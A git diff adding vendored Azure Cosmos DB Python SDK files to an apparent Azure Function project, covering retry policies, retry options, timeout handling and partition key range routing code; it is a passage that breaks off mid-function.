b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_resource_throttle_retry_policy.py @@ -0,0 +1,60 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for resource throttle retry policy implementation in the Azure +Cosmos database service. +""" + +from . import http_constants + + +class ResourceThrottleRetryPolicy(object): + def __init__(self, max_retry_attempt_count, fixed_retry_interval_in_milliseconds, max_wait_time_in_seconds): + self._max_retry_attempt_count = max_retry_attempt_count + self._fixed_retry_interval_in_milliseconds = fixed_retry_interval_in_milliseconds + self._max_wait_time_in_milliseconds = max_wait_time_in_seconds * 1000 + self.current_retry_attempt_count = 0 + self.cummulative_wait_time_in_milliseconds = 0 + + def ShouldRetry(self, exception): + """Returns true if should retry based on the passed-in exception. + + :param (exceptions.CosmosHttpResponseError instance) exception: + :rtype: boolean + """ + if self.current_retry_attempt_count < self._max_retry_attempt_count: + self.current_retry_attempt_count += 1 + self.retry_after_in_milliseconds = 0 # pylint: disable=attribute-defined-outside-init + + if self._fixed_retry_interval_in_milliseconds: + self.retry_after_in_milliseconds = ( # pylint: disable=attribute-defined-outside-init + self._fixed_retry_interval_in_milliseconds + ) + elif http_constants.HttpHeaders.RetryAfterInMilliseconds in exception.headers: + self.retry_after_in_milliseconds = int( # pylint: disable = attribute-defined-outside-init + exception.headers[http_constants.HttpHeaders.RetryAfterInMilliseconds] + ) + + if self.cummulative_wait_time_in_milliseconds < self._max_wait_time_in_milliseconds: + self.cummulative_wait_time_in_milliseconds += self.retry_after_in_milliseconds + return True + + return False diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_retry_options.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_retry_options.py new file mode 100644 index 0000000..b37e424 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_retry_options.py @@ -0,0 +1,56 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Class for retry options in the Azure Cosmos database service. +""" + + +class RetryOptions(object): + """The retry options to be applied to all requests when retrying. + + :ivar int MaxRetryAttemptCount: + Max number of retries to be performed for a request. Default value 9. + :ivar int FixedRetryIntervalInMilliseconds: + Fixed retry interval in milliseconds to wait between each retry ignoring + the retryAfter returned as part of the response. + :ivar int MaxWaitTimeInSeconds: + Max wait time in seconds to wait for a request while the retries are happening. + Default value 30 seconds. + """ + + def __init__( + self, max_retry_attempt_count=9, fixed_retry_interval_in_milliseconds=None, max_wait_time_in_seconds=30 + ): + self._max_retry_attempt_count = max_retry_attempt_count + self._fixed_retry_interval_in_milliseconds = fixed_retry_interval_in_milliseconds + self._max_wait_time_in_seconds = max_wait_time_in_seconds + + @property + def MaxRetryAttemptCount(self): + return self._max_retry_attempt_count + + @property + def FixedRetryIntervalInMilliseconds(self): + return self._fixed_retry_interval_in_milliseconds + + @property + def MaxWaitTimeInSeconds(self): + return self._max_wait_time_in_seconds diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_retry_utility.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_retry_utility.py new file mode 100644 index 0000000..5f0fc2c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_retry_utility.py @@ -0,0 +1,215 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal methods for executing functions in the Azure Cosmos database service. +""" + +import time + +from azure.core.exceptions import AzureError, ClientAuthenticationError +from azure.core.pipeline.policies import RetryPolicy + +from . import exceptions +from . import _endpoint_discovery_retry_policy +from . import _resource_throttle_retry_policy +from . import _default_retry_policy +from . import _session_retry_policy +from . import _gone_retry_policy +from .http_constants import HttpHeaders, StatusCodes, SubStatusCodes + + +# pylint: disable=protected-access + + +def Execute(client, global_endpoint_manager, function, *args, **kwargs): + """Executes the function with passed parameters applying all retry policies + + :param object client: + Document client instance + :param object global_endpoint_manager: + Instance of _GlobalEndpointManager class + :param function function: + Function to be called wrapped with retries + :param (non-keyworded, variable number of arguments list) *args: + :param (keyworded, variable number of arguments list) **kwargs: + + """ + # instantiate all retry policies here to be applied for each request execution + endpointDiscovery_retry_policy = _endpoint_discovery_retry_policy.EndpointDiscoveryRetryPolicy( + client.connection_policy, global_endpoint_manager, *args + ) + + resourceThrottle_retry_policy = _resource_throttle_retry_policy.ResourceThrottleRetryPolicy( + client.connection_policy.RetryOptions.MaxRetryAttemptCount, + client.connection_policy.RetryOptions.FixedRetryIntervalInMilliseconds, + client.connection_policy.RetryOptions.MaxWaitTimeInSeconds, + ) + defaultRetry_policy = _default_retry_policy.DefaultRetryPolicy(*args) + + sessionRetry_policy = _session_retry_policy._SessionRetryPolicy( + client.connection_policy.EnableEndpointDiscovery, global_endpoint_manager, *args + ) + partition_key_range_gone_retry_policy = _gone_retry_policy.PartitionKeyRangeGoneRetryPolicy(client, *args) + + while True: + try: + client_timeout = kwargs.get('timeout') + start_time = time.time() + if args: + result = ExecuteFunction(function, global_endpoint_manager, *args, **kwargs) + else: + result = ExecuteFunction(function, *args, **kwargs) + if not client.last_response_headers: + client.last_response_headers = {} + + # setting the throttle related response headers before returning the result + client.last_response_headers[ + HttpHeaders.ThrottleRetryCount + ] = resourceThrottle_retry_policy.current_retry_attempt_count + client.last_response_headers[ + HttpHeaders.ThrottleRetryWaitTimeInMs + ] = resourceThrottle_retry_policy.cummulative_wait_time_in_milliseconds + + return result + except exceptions.CosmosHttpResponseError as e: + retry_policy = None + if e.status_code == StatusCodes.FORBIDDEN and e.sub_status == SubStatusCodes.WRITE_FORBIDDEN: + retry_policy = endpointDiscovery_retry_policy + elif e.status_code == StatusCodes.TOO_MANY_REQUESTS: + retry_policy = resourceThrottle_retry_policy + elif ( + e.status_code == StatusCodes.NOT_FOUND + and e.sub_status + and e.sub_status == SubStatusCodes.READ_SESSION_NOTAVAILABLE + ): + retry_policy = sessionRetry_policy + elif exceptions._partition_range_is_gone(e): + retry_policy = partition_key_range_gone_retry_policy + else: + retry_policy = defaultRetry_policy + + # If none of the retry policies applies or there is no retry needed, set the + # throttle related response headers and re-throw the exception back arg[0] + # is the request. It needs to be modified for write forbidden exception + if not retry_policy.ShouldRetry(e): + if not client.last_response_headers: + client.last_response_headers = {} + client.last_response_headers[ + HttpHeaders.ThrottleRetryCount + ] = resourceThrottle_retry_policy.current_retry_attempt_count + client.last_response_headers[ + HttpHeaders.ThrottleRetryWaitTimeInMs + ] = resourceThrottle_retry_policy.cummulative_wait_time_in_milliseconds + if args and args[0].should_clear_session_token_on_session_read_failure: + client.session.clear_session_token(client.last_response_headers) + raise + + # Wait for retry_after_in_milliseconds time before the next retry + time.sleep(retry_policy.retry_after_in_milliseconds / 1000.0) + if client_timeout: + kwargs['timeout'] = client_timeout - (time.time() - start_time) + if kwargs['timeout'] <= 0: + raise exceptions.CosmosClientTimeoutError() + + +def ExecuteFunction(function, *args, **kwargs): + """Stub method so that it can be used for mocking purposes as well. + """ + return function(*args, **kwargs) + + +def _configure_timeout(request, absolute, per_request): + # type: (azure.core.pipeline.PipelineRequest, Optional[int], int) -> Optional[AzureError] + if absolute is not None: + if absolute <= 0: + raise exceptions.CosmosClientTimeoutError() + if per_request: + # Both socket timeout and client timeout have been provided - use the shortest value. + request.context.options['connection_timeout'] = min(per_request, absolute) + else: + # Only client timeout provided. + request.context.options['connection_timeout'] = absolute + elif per_request: + # Only socket timeout provided. + request.context.options['connection_timeout'] = per_request + + +class ConnectionRetryPolicy(RetryPolicy): + + def __init__(self, **kwargs): + clean_kwargs = {k: v for k, v in kwargs.items() if v is not None} + super(ConnectionRetryPolicy, self).__init__(**clean_kwargs) + + def send(self, request): + """Sends the PipelineRequest object to the next policy. Uses retry settings if necessary. + Also enforces an absolute client-side timeout that spans multiple retry attempts. + + :param request: The PipelineRequest object + :type request: ~azure.core.pipeline.PipelineRequest + :return: Returns the PipelineResponse or raises error if maximum retries exceeded. + :rtype: ~azure.core.pipeline.PipelineResponse + :raises ~azure.core.exceptions.AzureError: Maximum retries exceeded. + :raises ~azure.cosmos.exceptions.CosmosClientTimeoutError: Specified timeout exceeded. + :raises ~azure.core.exceptions.ClientAuthenticationError: Authentication failed. + """ + absolute_timeout = request.context.options.pop('timeout', None) + per_request_timeout = request.context.options.pop('connection_timeout', 0) + + retry_error = None + retry_active = True + response = None + retry_settings = self.configure_retries(request.context.options) + while retry_active: + try: + start_time = time.time() + _configure_timeout(request, absolute_timeout, per_request_timeout) + + response = self.next.send(request) + if self.is_retry(retry_settings, response): + retry_active = self.increment(retry_settings, response=response) + if retry_active: + self.sleep(retry_settings, request.context.transport, response=response) + continue + break + except ClientAuthenticationError: # pylint:disable=try-except-raise + # the authentication policy failed such that the client's request can't + # succeed--we'll never have a response to it, so propagate the exception + raise + except exceptions.CosmosClientTimeoutError as timeout_error: + timeout_error.inner_exception = retry_error + timeout_error.response = response + timeout_error.history = retry_settings['history'] + raise + except AzureError as err: + retry_error = err + if self._is_method_retryable(retry_settings, request.http_request): + retry_active = self.increment(retry_settings, response=request, error=err) + if retry_active: + self.sleep(retry_settings, request.context.transport) + continue + raise err + finally: + end_time = time.time() + if absolute_timeout: + absolute_timeout -= (end_time - start_time) + + self.update_context(response.context, retry_settings) + return response diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/__init__.py new file mode 100644 index 0000000..c8cc2af --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/__init__.py @@ -0,0 +1,20 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..078180e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/__pycache__/collection_routing_map.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/__pycache__/collection_routing_map.cpython-39.pyc new file mode 100644 index 0000000..74b8e30 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/__pycache__/collection_routing_map.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/__pycache__/routing_map_provider.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/__pycache__/routing_map_provider.cpython-39.pyc new file mode 100644 index 0000000..133d356 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/__pycache__/routing_map_provider.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/__pycache__/routing_range.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/__pycache__/routing_range.cpython-39.pyc new file mode 100644 index 0000000..9374915 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/__pycache__/routing_range.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/aio/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/aio/__init__.py new file mode 100644 index 0000000..a9253df --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/aio/__init__.py @@ -0,0 +1,20 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/aio/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/aio/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..a7cda0d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/aio/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/aio/__pycache__/routing_map_provider.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/aio/__pycache__/routing_map_provider.cpython-39.pyc new file mode 100644 index 0000000..4f8a944 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/aio/__pycache__/routing_map_provider.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/aio/routing_map_provider.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/aio/routing_map_provider.py new file mode 100644 index 0000000..9012f21 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/aio/routing_map_provider.py @@ -0,0 +1,194 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for partition key range cache implementation in the Azure +Cosmos database service. +""" + +from ... import _base +from ..collection_routing_map import CollectionRoutingMap +from .. import routing_range + +# pylint: disable=protected-access + + +class PartitionKeyRangeCache(object): + """ + PartitionKeyRangeCache provides list of effective partition key ranges for a + collection. + + This implementation loads and caches the collection routing map per + collection on demand. + """ + + def __init__(self, client): + """ + Constructor + """ + + self._documentClient = client + + # keeps the cached collection routing map by collection id + self._collection_routing_map_by_item = {} + + async def get_overlapping_ranges(self, collection_link, partition_key_ranges): + """Given a partition key range and a collection, return the list of + overlapping partition key ranges. + + :param str collection_link: The name of the collection. + :param list partition_key_ranges: List of partition key range. + :return: List of overlapping partition key ranges. + :rtype: list + """ + cl = self._documentClient + + collection_id = _base.GetResourceIdOrFullNameFromLink(collection_link) + + collection_routing_map = self._collection_routing_map_by_item.get(collection_id) + if collection_routing_map is None: + collection_pk_ranges = [pk async for pk in cl._ReadPartitionKeyRanges(collection_link)] + # for large collections, a split may complete between the read partition key ranges query page responses, + # causing the partitionKeyRanges to have both the children ranges and their parents. Therefore, we need + # to discard the parent ranges to have a valid routing map. + collection_pk_ranges = PartitionKeyRangeCache._discard_parent_ranges(collection_pk_ranges) + collection_routing_map = CollectionRoutingMap.CompleteRoutingMap( + [(r, True) for r in collection_pk_ranges], collection_id + ) + self._collection_routing_map_by_item[collection_id] = collection_routing_map + return collection_routing_map.get_overlapping_ranges(partition_key_ranges) + + @staticmethod + def _discard_parent_ranges(partitionKeyRanges): + parentIds = set() + for r in partitionKeyRanges: + if isinstance(r, dict) and routing_range.PartitionKeyRange.Parents in r: + for parentId in r[routing_range.PartitionKeyRange.Parents]: + parentIds.add(parentId) + return (r for r in partitionKeyRanges if r[routing_range.PartitionKeyRange.Id] not in parentIds) + + +def _second_range_is_after_first_range(range1, range2): + if range1.max > range2.min: + ##r.min < #previous_r.max + return False + + if range2.min == range1.max and range1.isMaxInclusive and range2.isMinInclusive: + # the inclusive ending endpoint of previous_r is the same as the inclusive beginning endpoint of r + return False + + return True + + +def _is_sorted_and_non_overlapping(ranges): + for idx, r in list(enumerate(ranges))[1:]: + previous_r = ranges[idx - 1] + if not _second_range_is_after_first_range(previous_r, r): + return False + return True + + +def _subtract_range(r, partition_key_range): + """Evaluates and returns r - partition_key_range + + :param dict partition_key_range: Partition key range. + :param routing_range.Range r: query range. + :return: The subtract r - partition_key_range. + :rtype: routing_range.Range + """ + + left = max(partition_key_range[routing_range.PartitionKeyRange.MaxExclusive], r.min) + + if left == r.min: + leftInclusive = r.isMinInclusive + else: + leftInclusive = False + + queryRange = routing_range.Range(left, r.max, leftInclusive, r.isMaxInclusive) + return queryRange + + +class SmartRoutingMapProvider(PartitionKeyRangeCache): + """ + Efficiently uses PartitionKeyRangeCache and minimizes the unnecessary + invocation of CollectionRoutingMap.get_overlapping_ranges() + """ + + async def get_overlapping_ranges(self, collection_link, partition_key_ranges): + """ + Given the sorted ranges and a collection, + Returns the list of overlapping partition key ranges + + :param str collection_link: The collection link. + :param (list of routing_range.Range) partition_key_ranges: + The sorted list of non-overlapping ranges. + :return: List of partition key ranges. + :rtype: list of dict + :raises ValueError: + If two ranges in partition_key_ranges overlap or if the list is not sorted + """ + + # validate if the list is non-overlapping and sorted + if not _is_sorted_and_non_overlapping(partition_key_ranges): + raise ValueError("the list of ranges is not a non-overlapping sorted ranges") + + target_partition_key_ranges = [] + + it = iter(partition_key_ranges) + try: + currentProvidedRange = next(it) + while True: + if currentProvidedRange.isEmpty(): + # skip and go to the next item\ + currentProvidedRange = next(it) + continue + + if target_partition_key_ranges: + queryRange = _subtract_range(currentProvidedRange, target_partition_key_ranges[-1]) + else: + queryRange = currentProvidedRange + + overlappingRanges = await PartitionKeyRangeCache.get_overlapping_ranges(self, + collection_link, queryRange) + assert overlappingRanges, "code bug: returned overlapping ranges for queryRange {} is empty".format( + queryRange + ) + target_partition_key_ranges.extend(overlappingRanges) + + lastKnownTargetRange = routing_range.Range.PartitionKeyRangeToRange(target_partition_key_ranges[-1]) + + # the overlapping ranges must contain the requested range + assert ( + currentProvidedRange.max <= lastKnownTargetRange.max + ), "code bug: returned overlapping ranges {} does not contain the requested range {}".format( + overlappingRanges, queryRange + ) + + # the current range is contained in target_partition_key_ranges just move forward + currentProvidedRange = next(it) + + while currentProvidedRange.max <= lastKnownTargetRange.max: + # the current range is covered too. just move forward + currentProvidedRange = next(it) + except StopIteration: + # when the iteration is exhausted we get here. There is nothing else to be done + pass + + return target_partition_key_ranges diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/collection_routing_map.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/collection_routing_map.py new file mode 100644 index 0000000..28cb6bc --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/collection_routing_map.py @@ -0,0 +1,181 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for collection routing map implementation in the Azure Cosmos +database service. +""" + +import bisect + +from six.moves import xrange + +from azure.cosmos._routing import routing_range +from azure.cosmos._routing.routing_range import PartitionKeyRange + + +class CollectionRoutingMap(object): + """Stores partition key ranges in an efficient way with some additional + information and provides convenience methods for working with set of ranges. + """ + + MinimumInclusiveEffectivePartitionKey = "" + MaximumExclusiveEffectivePartitionKey = "FF" + + def __init__( + self, range_by_id, range_by_info, ordered_partition_key_ranges, ordered_partition_info, collection_unique_id + ): + self._rangeById = range_by_id + self._rangeByInfo = range_by_info + self._orderedPartitionKeyRanges = ordered_partition_key_ranges + + self._orderedRanges = [ + routing_range.Range(pkr[PartitionKeyRange.MinInclusive], pkr[PartitionKeyRange.MaxExclusive], True, False) + for pkr in ordered_partition_key_ranges + ] + self._orderedPartitionInfo = ordered_partition_info + self._collectionUniqueId = collection_unique_id + + @classmethod + def CompleteRoutingMap(cls, partition_key_range_info_tupple_list, collection_unique_id): + rangeById = {} + rangeByInfo = {} + + sortedRanges = [] + for r in partition_key_range_info_tupple_list: + rangeById[r[0][PartitionKeyRange.Id]] = r + rangeByInfo[r[1]] = r[0] + sortedRanges.append(r) + + sortedRanges.sort(key=lambda r: r[0][PartitionKeyRange.MinInclusive]) + partitionKeyOrderedRange = [r[0] for r in sortedRanges] + orderedPartitionInfo = [r[1] for r in sortedRanges] + + if not CollectionRoutingMap.is_complete_set_of_range(partitionKeyOrderedRange): + return None + return cls(rangeById, rangeByInfo, partitionKeyOrderedRange, orderedPartitionInfo, collection_unique_id) + + def get_ordered_partition_key_ranges(self): + """Gets the ordered partition key ranges + + :return: Ordered list of partition key ranges. + :rtype: list + """ + return self._orderedPartitionKeyRanges + + def get_range_by_effective_partition_key(self, effective_partition_key_value): + """Gets the range containing the given partition key + + :param str effective_partition_key_value: The partition key value. + :return: The partition key range. + :rtype: dict + """ + if CollectionRoutingMap.MinimumInclusiveEffectivePartitionKey == effective_partition_key_value: + return self._orderedPartitionKeyRanges[0] + + if CollectionRoutingMap.MaximumExclusiveEffectivePartitionKey == effective_partition_key_value: + return None + + sortedLow = [(r.min, not r.isMinInclusive) for r in self._orderedRanges] + + index = bisect.bisect_right(sortedLow, (effective_partition_key_value, True)) + if index > 0: + index = index - 1 + return self._orderedPartitionKeyRanges[index] + + def get_range_by_partition_key_range_id(self, partition_key_range_id): + """Gets the partition key range given the partition key range id + + :param str partition_key_range_id: The partition key range id. + :return: The partition key range. + :rtype: dict + """ + t = self._rangeById.get(partition_key_range_id) + + if t is None: + return None + return t[0] + + def get_overlapping_ranges(self, provided_partition_key_ranges): + """Gets the partition key ranges overlapping the provided ranges + + :param list provided_partition_key_ranges: List of partition key ranges. + :return: List of partition key ranges, where each is a dict. + :rtype: list + """ + + if isinstance(provided_partition_key_ranges, routing_range.Range): + return self.get_overlapping_ranges([provided_partition_key_ranges]) + + minToPartitionRange = {} + + sortedLow = [(r.min, not r.isMinInclusive) for r in self._orderedRanges] + sortedHigh = [(r.max, r.isMaxInclusive) for r in self._orderedRanges] + + for providedRange in provided_partition_key_ranges: + minIndex = bisect.bisect_right(sortedLow, (providedRange.min, not providedRange.isMinInclusive)) + if minIndex > 0: + minIndex = minIndex - 1 + + maxIndex = bisect.bisect_left(sortedHigh, (providedRange.max, providedRange.isMaxInclusive)) + if maxIndex >= len(sortedHigh): + maxIndex = maxIndex - 1 + + for i in xrange(minIndex, maxIndex + 1): + if routing_range.Range.overlaps(self._orderedRanges[i], providedRange): + minToPartitionRange[ + self._orderedPartitionKeyRanges[i][PartitionKeyRange.MinInclusive] + ] = self._orderedPartitionKeyRanges[i] + + overlapping_partition_key_ranges = list(minToPartitionRange.values()) + + def getKey(r): + return r[PartitionKeyRange.MinInclusive] + + overlapping_partition_key_ranges.sort(key=getKey) + return overlapping_partition_key_ranges + + @staticmethod + def is_complete_set_of_range(ordered_partition_key_range_list): + isComplete = False + if ordered_partition_key_range_list: + + firstRange = ordered_partition_key_range_list[0] + lastRange = ordered_partition_key_range_list[-1] + isComplete = ( + firstRange[PartitionKeyRange.MinInclusive] == 